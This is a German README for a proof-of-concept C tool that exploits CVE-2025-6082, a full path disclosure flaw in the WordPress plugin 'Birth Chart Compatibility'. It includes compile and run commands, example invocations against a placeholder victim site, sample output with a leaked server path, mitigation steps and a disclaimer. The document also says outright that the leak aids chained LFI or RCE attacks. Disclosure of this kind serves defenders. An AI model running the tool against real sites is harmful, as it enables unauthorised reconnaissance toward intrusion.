
Proof-of-Concept nutzt die Full Path Disclosure-Schwachstelle im WordPress-Plugin „Birth Chart Compatibility“ (<=v2.0) aus.
Autor: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Schwachstelle: Full Path Disclosure (CWE-200)
Dieser Proof‑of‑Concept nutzt einen Full‑Path‑Disclosure‑Fehler im Birth Chart Compatibility WordPress-Plugin (Versionen ≤ 2.0). Der POC sendet eine HTTP-GET-Anfrage an den index.php-Endpunkt des Plugins, fängt alle PHP-Warnungen oder schwerwiegenden Fehler ab und extrahiert den Dateisystempfad des Servers (z. B. /var/www/html/wp-content/plugins/... oder C:\xampp\htdocs\...).
Die Offenlegung des vollständigen Pfades hilft einem Angreifer, weitere Angriffe wie Local File Inclusion (LFI), Remote Code Execution (RCE) oder andere Aufklärungsangriffe zu verketten.
gcc oder ein kompatibler C-Compilerlibcurl-Entwicklungsheaderargparse.c / argparse.hgcc -o fpd-poc exploit.c argparse.c -lcurl
./fpd-poc -u https://target.com [options]
Optionen:
-u, --url (Erforderlich) Basis-URL der Ziel-WordPress-Seite
-c, --cookies Cookies aus einer Datei verwenden (optional)
-v, --verbose Ausführliche curl-Ausgabe aktivieren
-f, --loop Wiederhole die Anfrage N-mal (z.B. -f 10)
-h, --help Diese Hilfemeldung anzeigen
Beispiel:
./fpd-poc -u https://victim.com
./fpd-poc -u https://victim.com -v -f 5 Beispielausgabe:
[+] Request sent successfully
[+] Input Url : https://victim.com
[+] Full Format Url: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php
[+] Http Code : 200
====================================[Response]====================================
Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...
[+] Response Len : 256
[+] Keyword found: Warning:
[+] Context: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php
Aktualisieren Sie das „Birth Chart Compatibility“-Plugin auf eine gepatchte Version (> 2.0), sobald diese veröffentlicht wird.
Deaktivieren oder entfernen Sie das Plugin, wenn Sie es nicht verwenden.
Verweigern Sie den direkten Zugriff auf die PHP-Dateien des Plugins (index.php) über Ihre Webserver-Konfiguration (z. B. über .htaccess- oder Nginx-Regeln).
Haftungsausschluss Dieser Code wird ausschließlich zu Bildungs- und Testzwecken bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben, kann illegal sein.